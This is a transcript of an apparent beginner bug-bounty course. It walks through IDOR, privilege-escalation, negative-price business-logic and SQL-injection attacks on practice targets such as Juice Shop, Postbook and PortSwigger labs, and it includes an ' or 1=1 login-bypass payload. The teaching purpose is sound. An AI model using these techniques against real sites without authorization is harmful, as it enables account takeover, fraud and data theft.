are going to be full of errors because I actually made them just for bullet points for myself, and I was going to keep them on my second monitor, and then I realized I didn't have anything to show you and I wasn't just going to have a blank screen. So if you're wondering how can somebody with a PhD have such poor quality PowerPoints, they were originally just my notes. And so I decided rather than sit here and comb through them and go back over it, I will just show you. This is basically what my notes look like when I take notes, and walk you through them just so we can have a better understanding of a few more exploits before we move into Burp. So first, changing passwords. You will actually come across this in Juice Shop when we are practicing, and more as we get further into the course. Sometimes you will see a URL that looks similar to this, or in Burp, it will pop up at the bottom of a post request, and we will have something similar to this, like a change password. You will have the username, and then the new password will be stored right here. And in something like this, you could actually grab someone else's username and on your victim account and try and change the password to it and see if you're able to pull that off. Or you can go ahead and see if you can maybe delete your victim account by, instead of having change password, you'd have delete account or delete user or just delete. And then you can put the username here and you would obviously not have the password. You will also in Burp be able to have delete instead of, you'll have put, post, delete options, and you can try and delete the account through Burp. And if you are unable to, even if you aren't able to pull any of that off, if you have a URL that has a username and a password in it, even if it is encoded with something as simple as base64, this would be an information disclosure. And we'll get to why this would be an information disclosure in just a few slides. Okay, we talked about this a little bit in the last PowerPoint in the last video. If you have a website, something similar to this, which I actually just copied this out of the OWASP guide and the OWASP pen testing guide, as well as another image that we're going to come to here in a second. Sometimes you'll come to something like this. If you are logged out and you copy and paste in a URL that requires you to be authenticated, and it says authenticated no, and it does not allow you to view the site, you can just change this authentication here to yes or true and see if you are able to access the site and see what you can gain access to. And then we can check the logout functionality. And this is why it is an information disclosure if you have a username and a password in the URL, because it is possible for you to log out on your computer and then close the browser, and you'll be able to open up the browser and it has cached the previous page that you were in, and you can go back into the history and open that page. And if it opens, even if you're not able to go to any other links because you're not authenticated anymore, but if it opens that URL and your username and password is in there, it would be an information disclosure. Or if you log out and you don't close the browser, it's possible to hit the back arrow or the back button and go to the previous page and have the information there. And this can also be more than just information disclosure. If you're able to hit the back button after you've logged out and then browse the site again and it re-authenticate you, this is something that's listed in the OWASP guide. It's something that happens. It's not very common, but it's something to check for. And you might be thinking this isn't a very big deal, because that's what I originally thought. I was thinking this isn't really a big deal because when you try to explain this to a program, they're going to want to know, how is this impactful? How can this be used against us? And at first, it isn't really a big deal if it's on your computer. If you can hit the back arrow and access your own password and username, it's not a big deal. Or even if you hit the back arrow and it re-authenticates your session and you're able to browse through whatever site it is. But it is a big deal if you're at a public library or you're in school and you're on one of your school computers. It is a problem if you're in a public place. Even if you log out and you go back, some other person can access this information. And so if you're wondering what the impact of this is, that would be the impact of not having the proper configuration here with the authentication. Cookies and tokens, we've talked about these several times now. Most websites, I would say probably every website we're going to come across, especially when you have to prove authentication, meaning you've logged in, is going to have cookies and tokens. And there's going to be several ways that these can be manipulated and vulnerable. We've already seen a few of them, such as cookies storing usernames and passwords for your authentication. You'll be able to look and see if the cookie is in the URL. And if it is, this could be a problem, especially if you are able to crack the cookie, which I'm going to show you in just a second. A good way to try and do that without actually knowing a whole lot about different encryption methods. And the reason that this is an issue is because it is similar to the previous ones. It's an information disclosure. Someone else can access your session or your account. And so reusable tokens can also be an issue. One of the ways you can test for reusable tokens or reusable tokens, or even if you can predict future tokens, is by logging in and out several times of the website and copy your tokens and your cookies and save them in a document and see if there's any pattern, and if you can guess future cookies that might possibly be issued. This is a problem because you could hijack someone else's session just by taking their cookie and replacing it with replacing their cookie with your own. And then one of the places that you will go that is probably the most helpful, especially being new and not being able to recognize like MD5 or base64 or different types of encoding, is going to be CyberChef, because CyberChef will do this for you. and this is Cyber Chef. And so what you would do is you can actually come over here and just type in magic. You drag it over into your recipe, and it will automatically try and sense whatever you have, whatever encoding you are trying to figure out. So what we'll do is we'll actually just do an example real quick. We'll type in base 64. We will come over here. We'll actually can that base 64, and if we had a username, and this is base 64 encoded, you will almost always notice base 64 encoded with the equal signs at the end. And so we have our base 64 is encoded. Let's say you come across that and you don't know what it is and you're struggling to crack the cookie. What you do is you can just come over here and paste it into the input. You can come over here and go magic and pull it over, and it should be able to detect that this is base 64, and it will give you, I spelled username wrong. It will give you the username. And so you don't actually have to try and work to crack these. You can just come over here, type in magic, paste it in, and if it can be cracked, Cyber Chef will automatically put this out for you. This is a great and easy tool to use when trying to crack cookies. So in the next video, we're going to give a look at burp in Postbook, which is Hacker 101 CTF. And we're going to look at some of the functionalities in burp, and then I'm going to see if you are up to the challenge and trying to find an IDOR all on your own. And it might take a little bit of time. It's not a very complicated capture the flag, but it might take a little while because it's going to be one of your first times using burp, trying to find an IDOR, and then it might take just a little while to click around within Postbook and try and get the hang of what it's doing, what's happening in the URL, and what you can intercept. And so all of that's coming up and more. I'll see you in the next video. Okay, we are going to, in this video, go through some of the functionality of burp. And so I'm going to go ahead and have you navigate over to Hacker 101 and get into their CTF. And we're going to open up Postbook, and you can go ahead and click go and pull it open. And when you're there, the first page you'll come to will look like this. And so we'll go ahead and come over on burp. You can turn your intercept on and make sure that you are sending all of your traffic through your proxy by coming over here. We'll go to preferences, scroll down to settings, and make sure that you have manual proxy configuration, and then it looks like this. And once you have that done, you can click OK, and your proxy should now be set up to intercept your traffic. And just to give it a test, you can refresh the page and make sure that it pulls through here, and you can forward all of the requests we intercept, or you can just turn it back off and then turn it back on. But we are going to come in here and we are going to sign up. And so we'll go ahead and click sign up, and you can just see what's going on in here. We have our sign up.php. You can see it's pulling that from our URL. We have a get request. We'll forward that, and we'll come back over here, and this is where you're going to make your username. And we can just type in test, and password can be test, and you can submit your query. And then in here you can see your username and your password. And if you wanted to actually try and mess with this and see what we can do with it, we would send it to repeater. So you just right click and click send to repeater. And over here we can send this request as many times as we would like to. And so in here we can change the username and click test1 and then send it, and we are getting a 302 in response. So let's go ahead and shut this off and see we have successfully signed up. And I think we actually created the test1 account as well. Yep, so we have made the test account and the test1 account. And while you're in Repeater over here, you can see that this would be not a very secure way of submitting these things. You will actually come across this really regularly, pretty regularly, even on large, very common websites. And you can see what you can do here. You can try and manipulate things and see just what you can do, and maybe type a GET request and change to a different URL and see what response you get over here. There's lots of things you can do, and in Repeater you can send this as many times as you want to the server and really just try and figure out if you can get anywhere that you shouldn't be with this. And so we're going to go ahead and come back to our proxy, turn it on, and now we are going to just create a post. We'll go hello world, create post. We have a user ID of 5, and remember, every time we see ID, we should be thinking IDOR. What can we change? Where can we go? What can we get with this? And we have the body of the message over here. We have a cookie over here. You could bring this over to CyberChef and see if maybe there's anything in there. If you remember, we just go magic, and then we would paste it in, and you could see we didn't get anything out of our cookie. And so that's okay. We would come back here, and we're in our burp. We can send this to Repeater again, and one of the things you could try and do is see what you can delete the cookie, see what you can do with this, and see if it still works. And it says we get a redirect. You can follow the redirect and then come down here and see what your response is, and it says we need to sign in. So you have to be authenticated, so the cookie is necessary, something that we have to have in order to continue on for authentication purposes. But as you can see, this is kind of how I would just go about testing at the beginning, is just see what I can do with this ID, what I can do with burp with a body, see where I can get, where I can go, see what responses come back. And with that, I think I've given you a pretty good clue here with this user ID. There is an IDOR in Postbook. I'm going to give you the challenge now to open up burp, come in, make an account or 2 accounts, and see if you can find the IDOR, see if you can find the flag, and see, just get used to playing around with burp, get used to playing around with Repeater, and see if you can find any of the flags. I'm going to go ahead and shut this video off, and we'll start up in the next one, and we'll walk through the process of finding the IDOR in Postbook. So good luck with that challenge. Okay, before we go ahead and solve this challenge, I want to introduce you into one more functionality inside burp that is going to be helpful in the future as you're doing bug bounty hunting, and that is the intruder mode. So right here in intruder, one of the things we could do with intruder is, as we come in here and we just refresh this page, we have this ID of 6. Let's say there are 1,000 different numbers in here. What you can do is send this to intruder, and it will actually go through these numbers for us. So you can come over here and you can go to position, and we will clear this, and you'll highlight this number 6. And what it does is it will go through every number we specify in here and replace that number 6 and then give us back the response. So we can come over to our payload, and we can go simple, we can do a simple list, and then we will put in just numbers. We'll do 1 through 10, so you just go 1, 2, 3, 4, 5, 6, 7, 8, 9, 10. And now we have just a simple list, and we have just the one position, and we're going to go ahead and run through these numbers. And so what you do is you'd click Start Attack and go OK, and it will automatically replace that for us. And then we can click on these and see what we have in the response. And you can come through and see if we have found anything in here. It says write a new post, my profile. It doesn't look like anything. Oh, private, this is for my own eyes only. Number 2. And we see the same thing. And this one actually has someone put in actual content, and then you can go down to number 3, and you can see how this would make it easier, so you don't actually have to go through and do 1, 2, 3, 4 manually. You can, but you don't have to. And so what we would do if we wanted to get more malicious with this, as we're looking for an IDOR, we can come back into our proxy here, and you can turn it off, or you can use burp. I'm going to use the URL just because it's what we're used to, but I would encourage you to actually try this with burp. I'm going to show you how I would do it with the URL, and then you can actually come in here and see if you can run this exploit and find the flag with burp and without using the URL. And so what we do is the exact same thing. You can come in here and you can just go 1, and then somebody posted this. It's not private, it's to the public, and you can come here and you can type in 2, and this actually has the checkbox. Yes, this is my own eyes only. And so this would be something that is not supposed to be seen by everyone, and so this would be considered an IDOR. If this was an actual program, you could report this as an IDOR. And not only that, you can write inside someone else's entry here, and then you can save the post. And in saving the post, I am not actually sure why there are 2 flags, maybe one for writing on someone else's wall and one for the IDOR. I'm actually not entirely sure, but you can see the author was also an admin. So we made it beyond just a regular user and into an admin. And so this is how IDORs work. We're going to be moving from Postbook into Juice Shop. And the way I want to work through the Juice Shop vulnerabilities is by giving you just little hints, maybe telling you what part of the application there is a vulnerability, and then setting you free. And after you have spent a significant amount of time and you're starting to get frustrated or you want a clue, just continue watching the video, and I'm going to work through some of these vulnerabilities step by step. But I want you to give it a shot and try and figure out where the vulnerability is and see if you can solve the challenges on your own. And only if you're really struggling, come back and get another clue and then pause the video again and see if you can figure out the rest of the challenge on your own, kind of like we have been doing. But from this point on, it's going to be a lot more difficult for me to show you very specific vulnerabilities on multiple websites, because at this point, Juice Shop is going to be our main place of working, because there's not a whole lot of options when it comes to practicing specific vulnerabilities and then me showing them to you. So I want to give you clues of where they might be located in the application, and then set you free to try and exploit them, and then only when necessary help you with another clue. And so with that, you can actually continue playing around in Postbook and see just what else you can do in finding IDORs. I want you to get really comfortable using burp and sending things to repeater, getting comfortable with like modifying the cookies, deleting the cookies, changing IDs, and just seeing exactly how it works. And you're going to be getting more comfortable with it as we go on. But really all we're going to be focusing on is the cookies, the get and post requests, and then also there will be some more additional information down here, such as we saw when we were creating a user. You saw it say ask for a username. We gave it a username, a password, and so forth like that. And those are really, we're not going to pay a whole lot of attention to a lot of this other stuff right now, because it doesn't really apply to our skill level at this point. And so with that, I will see you in the next lesson, where we will be opening up Juice Shop once again. Okay, just a few more housekeeping things before we really begin performing a lot of exploits and going over a lot of things that we've already learned, and really trying to solidify this information into our memory. If you still have npm running and you have your server going, in order to close that, you can hit Command C, and that will get you out of a lot of really sticky situations. If you ever don't know what's going on and you're struggling and your cursor's hanging, you can just hit Command C, and that should close out anything you have running on your Kali machine. You don't want to just close a tab. So if you have two tabs open and one's hanging and it's really causing you a lot of trouble, you don't want to close it, because if you have an open port, you won't be able to use that port again, and you'll have to restart your whole machine. So you'll want to use Command C. And so if you remember to start up Juice Shop on your local machine, you need to CD, you need to change directories into your downloads, because that's where we save the file. We can list them, and then we need to CD into Juice Shop, because npm will boot up the files that are in here, and it needs to be inside this directory, otherwise it won't work. And so we go npm, and then we start, and that will open up Juice Shop for us. And it's now listening on port 3000, so it is up and running. But you will notice that if you have burp running and you turn your proxy on and you start clicking on things and you refresh the page, burp is not intercepting anything. It is not working for us. So we need to configure our traffic so that it goes through our proxy. And we're going to do that by going over here, opening a new tab. We will type in about config and hit enter. And I will warn you to proceed with caution, because this will change how your browser functions. So you want to accept the risk and continue. And we are going to type in network dot proxy, and this one right here, allow hijacking localhost. We'll click this, and we need it to change to true. And then we can go ahead and close out of this tab. And now if we refresh our page, you can see that our traffic is running through burp, and we are able to intercept the requests. And now with that, in the next video, I will lead you to our first vulnerability that we are going to begin working through. I will see you in the next video. Okay, we are ready to find our first IDOR on our vulnerable web application. So you can come in here and try and find it on your own, or I can give you a tip on how to get started. And if you want to try it completely on your own, you can go ahead and pause the video now, browse the application, and intercept your traffic with burp and see if you can find the IDOR. Okay, your first tip is going to be that we will find the IDOR in leaving customer feedback under someone else's user. So you can go ahead and try and find that now if you want, or keep playing the video for the next tip. Okay, the next tip is going to be creating an account. I already created one. I figured you didn't want to sit through me creating an account, so you can actually just come up here, click on the account setting, the account tab, go to login, create a login, and once you're logged in, try and find how you can leave feedback as someone else. We are going to go ahead and solve this challenge. If at any time you feel like we have gone far enough and you have enough clues, you can pause the video and try and solve it on your own from that point forward. But we're going to come over here to this menu. We are going to click Customer Feedback. Now, I want to give you another helpful tip. If math is not your strong suit, you can actually open up and inspect the element. You can come to Network, and then you can refresh this. And in our network, we will get a whole bunch of GET requests, and we will look through and find the one. Since this is called CAPTCHA, we're going to find the one that is labeled with CAPTCHA, and in there it will have for us the answer. And you see this request. We are going to look at the scoreboard at the end of this video, and I'll kind of talk through what this is, but we're going to go to this as soon as we solve this IDOR. But as we continue scrolling through and we're looking for the CAPTCHA right here, you can go to the response, the request, the cookies, the header. It's not the header. I believe it is the response. Our answer is going to be 11. So it will solve for you whatever math problem you have. And that's the easiest way to get through these. And so our answer is going to be 11. It has our user name. We can leave a comment. I like to just leave hello world. We will give it a rating, and then make sure to intercept when you submit this. And so we'll hit submit, and now we have our user ID. If you want, you can go ahead and pause the video and see if you can figure out what to do from here. What we will do is we're going to send this to the repeater. We can come up here, open it up. We can send this request to make sure it goes through. It says it was created, so we have successfully left feedback. But we want to leave feedback as someone else. And so what we do is we can change our ID to, let's just go 14. Just pick an arbitrary number that's less than the one we were using or the one we were assigned. And then we can send it, and it says it was created. So now we should be able to turn off our proxy intercept, come back to our web application, and it tells us we successfully solved the challenge of forging feedback. So this is an example of an IDOR where we are leaving feedback under some other user's name. And now I want to go to the scoreboard real quick. This is where you can see the challenges. I think it's spelled this way. Our scoreboard. And you can see all of the challenges that are available on this web application. We are not going to be going through all of these. We're just going to be going through a few of them, the ones that are specifically tailored to this course. Some of these are really advanced. Some of them we will come back to and we will solve later. But for now, we're going to walk through the ones that I believe we have covered a sufficient amount of material in this course for you to solve on your own. And so with that, I will see you in the next lesson. All right. I was playing around with the comment section in the products, and I realized you can actually leave feedback as someone else other than coming over here to our customer feedback. You can actually leave feedback from a different user right here on these products, and maybe you actually figured that out in the last one. And if you did, that's awesome. And if not, you can go ahead and try and solve this challenge on your own, and then we will go through it together. So if you want to give that a shot, you can go ahead and do that now. Okay, we are going to just open up one of the items that already has a review so that we have a name that we can leave feedback under. And what we'll do is come over and turn on our intercept and type in some kind of message, and then we will submit. We'll come over here and see if we can find it. And here it is. We can send this to our repeater. You can come over here and send this, and it says it was created. So we have the message, and then we have the author. So instead of having our name in here, we can put in Bender at Juice Shop. Was it dash? I think that is how it was written. And then we should be able to send this, and we'll actually just put in something else here and send it, and it says it was created. We'll turn the intercept off, and you can see here it was created under someone else's name, and it actually says we have successfully completed the challenge again. So there were two ways to accomplish this within the Juice Shop application. And we will continue on with our manipulation of text within Burp in the next video. I'll see you there. Okay, our next challenge is going to be one that we have talked about, but we have not actually seen, and I have not come across any vulnerable web apps to actually test this on and show it to you, but we have talked about it, and you might have to use some of your Googling skills, or just if you get stuck, follow along with the video and get a hint before you move on. But we're going to create an admin account, and this is something that is very possible that you will come across. It's not very common, but it does happen that you can find ways to create an admin account or escalate your privileges. So we're going to go ahead and make sure our intercept is off. And what I need you to do is go ahead and create an account and see if you can figure out how to get the account enrolled as an admin. And so you can go ahead and try that now. Okay, I think what I will have to do is log out, and I'm going to make a new account just the same. And I will come in here and go not yet a customer. This time we'll go and be John at john.com. And as soon as you get this done, we will turn on our intercept and we will register the account. Now what we're going to do here is we're going to send this to repeater, and over here is where we'll work on escalating the privileges to an admin. So we'll send this, and just to get a response to see what we have here. So our role is a customer, and this tells us that we're going to need to change the role. And so I actually just did this a few hours ago. I was just working through the application, and I'm going to show you exactly what happened to me because this will give you a really good idea of just the trial and error that we go through when we're testing applications. So I came in here, I typed in role just like this, and I typed in admin. And if you send it, since this user has already been created over here, we're actually going to have to change this to 1. And if we send it, we can see we've now created another user, but the role is still customer. And so I changed this to administrator, and it still didn't work. So I tried to change this to user admin, and then change this over here again. And we are still a customer. And I've tried user, I tried admin, I tried administrator, and finally what happened was I deleted this and I came up here and I tried to just move our input to see if that would make a difference. And I typed in admin just the same as before, and that looks good. And we'll change this to a 3, and then we will send it. And now you can see our role is now admin. So we have created an admin user. So if you take this user with this password that you just made, you can log in and browse the Juice Shop application as an admin. And so you'll actually see things like this in the wild. They're uncommon. You can actually go on HackerOne and read the hacktivity and see where people have actually got this to work. And you can see, just read the articles and read the submissions to observe how people have pulled this off. Some of them are going to be more complicated than this, but some of them really will be this simple. And so with that, I will see you in the next lesson. Okay, what I need you guys to do for this next lesson is go ahead and open up a new tab. And up here, we're going to go to PortSwigger, and you can go ahead and search for it. It should be the first one. And we're going to open it up, and we're going to move over to the login button. I've already created an account, and so go ahead, click on login, create an account. We're going to need it, especially in the coming lesson. So go ahead, click the login button, make an account, and I'll see you once you're logged in. Okay, once you have reached your login page, go ahead and click on Academy, and then go to All Labs. And once this loads, we're going to go ahead and scroll down until you find business logic. And I believe it's pretty far down in all of these labs. And so scroll down to our business logic errors, vulnerabilities right here. And we're going to be working through these right here. And so let's continue going forward. So these actually say solve because I already made the videos for these, and I realized that I never actually explained how you guys should get here and get to these labs before I started filming these videos. So I'm going to edit the video, and these are going to turn into unsolved. Okay, we are going to look at a few business logic vulnerabilities. And so these are very similar to the IDORs that we have been looking at. And so we're going to go ahead and just start here with this one right at the top. So you can go ahead and click on it, and we can look and see what exactly they have for us. And it says that it doesn't validate user input, and we're to buy this lightweight jacket. So you can go ahead and open up the lab, and this is where it brings us. It said we needed to log in, so we will go ahead and do that. And it gave us the login credentials, so we'll log in. And now we are supposed to buy this jacket. So I guess we can go ahead and view the details and add it to the cart. Let's actually come in here, turn the intercept on. We'll add it to the cart. And it tells us our price right here. And I don't know exactly how much we're allowed to spend, but I think we should be able to. Let's see if we can make this a negative number. And we'll go ahead and forward that. And then we'll just turn that off. And it did not add it to our cart. We have $100 to spend on this jacket. And this jacket is way over $100, $1,300. So we'll go ahead and see if we can turn the intercept on, add this to cart, and let's just change our price here and see if that works. Okay, we're allowed to add it to our cart. So we have no need to apply a coupon, and we should be able to place our order. And it says we have solved the challenge. So things like this and business logic errors, IDORs and business logic errors, they're going to be things that you have the opportunity to find. These are pretty common that you'll find these business logic vulnerabilities. They happen when developers get lazy or they're just not really paying attention to what they're doing. I've actually seen really advanced developers make very simple mistakes that made their web applications vulnerable just because they weren't paying attention. And so you can find these. They're pretty common. I know there's at least one bug bounty hunter that this is all they do. They look through burp, they look for business logic errors and what they can change just to find stuff that they shouldn't be able to and find vulnerabilities. These are pretty simple and they do take a long time to find, but you can find them just by doing really simple things, by just changing numbers and inputs. Sometimes you will find stuff that has been encoded. It'll say, like, you'd have the lightweight jacket. Let's actually go back. I'll just show you. Sometimes we will add things to our cart like this, and you would have this, it'd say price, and it would look like this instead. We'll encode it, base 64. You'd have this sitting inside your price instead of that number. And so what you have to do, if you see something like this, you'd have to take this and you'd come to your decoder, or you can go to CyberChef and you can put it in and try and decode the price. You're rarely going to see it where it's just a plain number, but this is way more common that you would just see a number here and that you would have to decode it. Sometimes these prices will be stored in places other than just something plain and simple like this. And so it's something that you're going to have to look for and poke around. They do take a while to find, but you can find them right off as a beginner who knows very little. And we're going to look at one more, and then I want to send you off on a challenge and see if you can find a business logic error on your own. I'll see you in the next video. Okay, it is time for your challenge. So if you navigate over to Juice Shop and get it running, what I want you to do is try and solve the challenge to where you actually are being paid $200 or $300 or $400 or more from this application. We just worked through 2 labs that are similar to this, so you can go ahead and try and solve this challenge, and when it's done you should get the green bar at the top of your screen that'll tell you that you have completed the challenge. So I want you to go ahead and pause this video and give that a try. Okay, how did that go? We're going to go ahead and walk through this in
the same manner in which I would solve this. So I'd go ahead and add something to your basket, and then we'll check our basket. And then at this point, what I would do is I'd go ahead and turn the intercept on and walk through the whole checkout process and see if there's anywhere that I am able to modify, and see if I can modify this in any way, shape, or form. And what I think I'm going to do is I don't actually want to walk through and have you watch me put all of that information in just to solve this challenge. So we'll go ahead and see if we can actually modify this before we get there. So it says we have basket ID of 5. We're buying product number 4. Let's see if it will let us do what we did in the previous challenge and put in a negative amount. Let's try 99, and then we'll turn the intercept off. It says we were able to add those to our to our basket, and they're going to pay us. That didn't work. Okay, they're going to pay us if we do that. So we'll go ahead and we'll try that again. $100 wasn't enough, so we'll come back to our products. We'll add to our basket. I forgot to turn burp on. We'll add this to our basket. We'll forward. Here's our quantity. I wonder if the rest of our content's at the end of this string. Well, we have our quantity, so what we'll do is we'll type in negative, and we'll do 200 this time. And we'll forward that and go to our basket, and that's more like it. We're going to get paid $400. So what you do at this point, I'm going to just walk through the checkout process. You would add an address, and then you would complete your order, and that should solve the challenge for you. So rather than having you watch me enter all of that information, that is how we would solve this challenge, and I will see you in the next video. Okay, we are going to continue with the business logic vulnerabilities. We're going to go ahead and open up this second one, and after this one I'm going to set you loose on a challenge. So what we'll do is we'll go ahead and open this up. It looks like the same as the one before. We need to buy this jacket, and we have our login user right here. So we'll go ahead and log in, and we'll try and proceed with buying the jacket. Okay, here's our jacket. So we'll go ahead and view details. We'll add it to the cart. We're going to do the exact same thing we did in the last one, and I'm going to do it the exact same way by starting out. Oh, we don't have a price. So we got our product ID, our product, and here's our value. Let's get 2 of them, and I'm assuming we have the same amount of money in our card as we had the last time to spend. So we'll go ahead and just put the negative sign in front of the 2, and we'll see if it allows us to put in a negative number. And we were. So in our cart, if we go look at it, it says we have negative $2,600. That means they are going to pay us. See if it'll go down by using these buttons. It does. So you wouldn't even have had to have done this in burp. You could have just come over here and click this button, and it means they're going to pay us this amount of money. So when we place our order, we're definitely going to be able to buy our jacket, and our store credit is going to increase. Oh, our price is not allowed to be less than 0. So they have at least they have that in place. So we'll go ahead and okay, made our cart empty. We're gonna have to go back and put that back in our cart. So what I think we'll do is we'll add this to our cart as well. I'm not sure how many of these we're gonna have to add. We'll go ahead and add one in. We're going to make it a negative number so that we can subtract it later. We'll go ahead and forward that. Turn our intercept off. Come back to our jacket. Turn our intercept on. View the details. I did not want to view the details. I meant to, yes, view the details. We're going to add one to the cart. So that way we can buy our jacket because that is our challenge. We'll go ahead and make sure that's negative. Forward, turn that off. And now we should have 2 negative items in our cart. It has to be above 0, but less than 100. So what we can do is we can just continue to subtract these. Oh, we'll add these. We'll go ahead and add these until we hit our price. Okay, it went back to 0 and removed it from our cart. So we'll go back over here, go back over here. Let's find something a little more expensive so we don't have to add that so many times. We'll go with the pool. Come to burp, turn our intercept on, and this is exactly how this would happen if you were testing it. It's just going to be a lot of trial and error. We're going to need, I'm going to guess, at least 15 of these. We'll just go ahead and add them to the cart. We don't need to intercept that. And go back to our cart, and there our total is now $76. So what we did is we just added 15 of these pools, which got us close to $1,500. And then $1,500. Then what we did is we went ahead and added our jacket in at a negative price because it wouldn't let us purchase anything at a negative number. And we only have $100 to spend. And so this should solve the challenge this time. So we'll go ahead and place our order. So I just wanted to add that you saw me make a lot of mistakes and a lot of trial and error in this video, and I want to thank you for being patient, but I also decided not to edit out all of the clicking that I had to do and the failures from this video because I wanted you to see what it's realistically like as you test web applications and as you're on the hunt. You will be doing what I just did the majority of your time, just trying to see if things work, and as they fail, you just go on and you try something new and you try a different way to try and exploit the application or the vulnerability. And so I want to just encourage you that as you become frustrated or things aren't working, to just keep pushing on and see if you can find that vulnerability. And I will see you in the next video for your challenge. Okay, it is time for your challenge. So if you navigate over to Juice Shop and get it running, what I want you to do is try and solve the challenge to where you actually are being paid $200 or $300 or $400 or more from this application. We just worked through 2 labs that are similar to this, so you can go ahead and try and solve this challenge, and when it's done, you should get the green bar at the top of your screen that'll tell you that you have completed the challenge. So I want you to go ahead and pause this video and give that a try. Okay, how did that go? We're going to go ahead and walk through this in the same manner in which I would solve this. So go ahead and add something to your basket, and then we'll check our basket. And then at this point, what I would do is I'd go ahead and turn the intercept on and walk through the whole checkout process and see if there's anywhere that I am able to modify, and see if I can modify this in any way, shape, or form. And what I think I'm going to do is I don't actually want to walk through and have you watch me put all of that information in just to solve this challenge. So we'll go ahead and see if we can actually modify this before we get there. So it says we have basket ID of 5. We're buying product number 4. Let's see if it will let us do what we did in the previous challenge. and put in a negative amount. Let's try 99, and then we'll turn the intercept off. It says we were able to add those to our basket, and they're going to pay us. That didn't work. Okay, they're going to pay us if we do that. So we'll go ahead and we'll try that again. $100 wasn't enough, so we'll come back to our products. We'll add to our basket. I forgot to turn burp on. We'll add this to our basket. We'll forward. Here's our quantity. I wonder if the rest of our content's at the end of this string. Well, we have our quantity, so what we'll do is we'll type in negative, and we'll do 200 this time. And we'll forward that, and go to our basket, and that's more like it. We're going to get paid $400. So what you do at this point, I'm going to just walk through the checkout process. You'd add an address, and then you would complete your order, and that should solve the challenge for you. So rather than having you watch me enter all of that information, that is how we would solve this challenge, and I will see you in the next video. Okay, we are going to begin working through some SQL injection. This is something that you can find. There are bug bounty hunters that dedicate their time only to looking for SQL injection. So if this is something that you find interesting, you can become really proficient at it, and this can be something that you primarily search for. I've actually found a few of these on some pretty prominent websites and web applications. So this is something I suggest learning and learning well. It's easy to look for. You don't really need to know a whole lot about SQL databases in order to find these, but it does help. In the bug bounty world, it's actually a lot easier than if you find these on a capture the flag, because all you have to do is put in a time delay to have a proof of concept. But in a capture the flag, you'll have to know a little more than what we're going to go over here. But for the sake of not going through and learning how to program in SQL databases, I think it would take just too much time. And so we're going to go through how to find these if you were to start looking on bug bounty programs. And I went ahead and opened up Nodus 15. You don't have to go through this or work through this. I'm only going through this to show you what it's going to look like, and then we're going to actually go over to PortSwigger, and we're going to work through their practice SQL injections. And so just to give you an idea of what we're doing, when you come to a login form, such as this one, whenever you come to something like this, one of the best things you should do and you should regularly check for is just to put in a single quote, and then you would hit enter and see what happens. And it says this user does not exist. What we're looking for is an error in the query. So I would go and I would do a double quote next, and I would hit check existence. And if you can hit an error, this is what we're looking for. And I'll actually show you in burp, because this is where you're probably going to be sending your request through. So you'll hit check existence. You would send this to your repeater. And I'm actually just going to go ahead and change this so you can see it. And then you would hit send, and it says we get an error in query. What we're going to see here in a little bit is we're going to see this be a 501, an internal service network error. And that's usually what you'll see when you start finding these. But you will find what is called a blind SQL injection, and we're going to look at those a little bit later. So we still have the error. So what do we do with the error is we're going to start the enumeration process, but we're actually not going to do that here. I just wanted to show you kind of what we're looking for here so that you can look for it on your own in the first PortSwigger lab and see what you can find if you can find it on your own. But just to give you a little more of an idea of what's going on in the background, the SQL database in the SQL language is going to look something like this. Select all from users. This will be where username equals, and this is what we input right here. So this would be our input. So what we did is we took this. This is what it'll look like. And this is what we can put in here. So you'd put your single quote or your double quote. And in the case of the Nodus web application, what it has is something like this. And then here's where you're putting your query, where you're putting in to see if the username exists. And so when we put in another double quote, what happens is you break the query and this produces the error right here because it doesn't need to be there. It shouldn't be there in order for this to work in programming. And so that's how you break it. One other thing I wanted to point out, just in case we don't come across this again, is sometimes you'll have a username and then you'll have a password down below. And if you put in something like test and it says this user does not exist, or it'll say invalid password or invalid username, that would be something that you could write up on a bug bounty program, because it would be information disclosure. If it says invalid password, then that means the username does exist. In the case of Nodus, I believe you're trying to find Nodus 16 password. So it says this user exists. So in this case, if there was a password and you got the password wrong, but the username right, it would say this invalid password. And that would be something you could write up because the username does exist.
Okay, what we're about to go over is going to be a little advanced, but I think it will help you visualize what's going on beyond more than what I just showed you in the last video. So what I have up is actually MySQL Workbench, and we have here just a simple database. This is a username I was testing. Here's an actual username and password. This is what a table will look like. And so in our query, we have select all from users, which is our schema, and then the table, which is users, that's not capitalized letter here. And so this is what a table looks like. And what's going to happen is this is running on a server, and when we send a query to the back end of a web application, it will reach out to the server and see if our query is true. And so this is what it will look like, the code will look like. I have been working on making a web app that I can put up for you guys to practice on, because really there's not a whole lot of places to practice our hacking skills. And so I've been working on putting together an application for you guys so that you have it available and you can practice what we're learning beyond just the sites that I've provided for you that other people have made. And so this is kind of what it looks like. We have our database and we're querying our database, and we are selecting all from the users table where the username equals, and then you can just pretend this is blank, because this is where our input is going to go in here. So we're selecting all users from the table where our input is at, and the password is equal to the other input. And so this makes sure that we have an actual username, and then it makes sure we have a password that matches our username and our password from our table. And so what this looks like is, over here we have our login page, and we have our login here, and if we type something in and we type in a password and we hit login, it's going to say wrong username / password. And so if we come in here and we actually have our actual login made, it'll say we are logged in. And so when we do a SQL injection, basically what we're doing is sending in a request that we decide what it's going to be to the database, to the back end of the website that reaches out to our database server. So this is a pretty simple SQL injection that we're going to be covering here, and we're going to be going into union select statements after this video, which I think are more common than what we're about to go over. And so it's very important to learn the union select SQL injection statements. There are some bug bounty hunters that dedicate all of their time only to SQL injection. So I just made this, I'm shooting this video because I really want you to understand what's going on, and it'll make more sense. Don't worry if it doesn't make sense right now. You may have to come back to this video more than once and go over the union select statements labs on your own, and then come back to them after a day or two and just continue practicing them until you really have them down. And so one of the things that we're looking for when we do a SQL injection is, I'm going to inspect this so you can actually see this happen. We're going to have our console up. Ignore my errors because my code is not perfect. When you put in a single quote, it will break this right here, and it will crash our server. So if we go ahead and throw that in, you see our connection is refused, and if you come over here, you can see our application has crashed, which means I need to restart it. And now our application's running. And so when you send that, you'll have an internal server error, which is what we essentially just got right here. And so how we get past this is by actually giving it a statement that is true, so that it will give us back the first login in the database. It'll give us back the first username and password. And so we're going to make a true statement right now. And so what we'll do is we'll just throw in, it doesn't really matter, and then our single quote, and then we'll have or 1 equals 1, and then we comment out everything after that. And then our password doesn't matter either, and it says we're logged in. But if we just have this right here, it'll tell us that we're not logged in because this isn't correct. So if we have this in here, what we're saying is this username right? Is this a true username? And the answer is no. You see we have wrong username and password. But 1 equals 1 is always true. And then we comment everything out after this statement with this hash, so our password doesn't work. So you see how this is all in one line of code? This is all getting ran 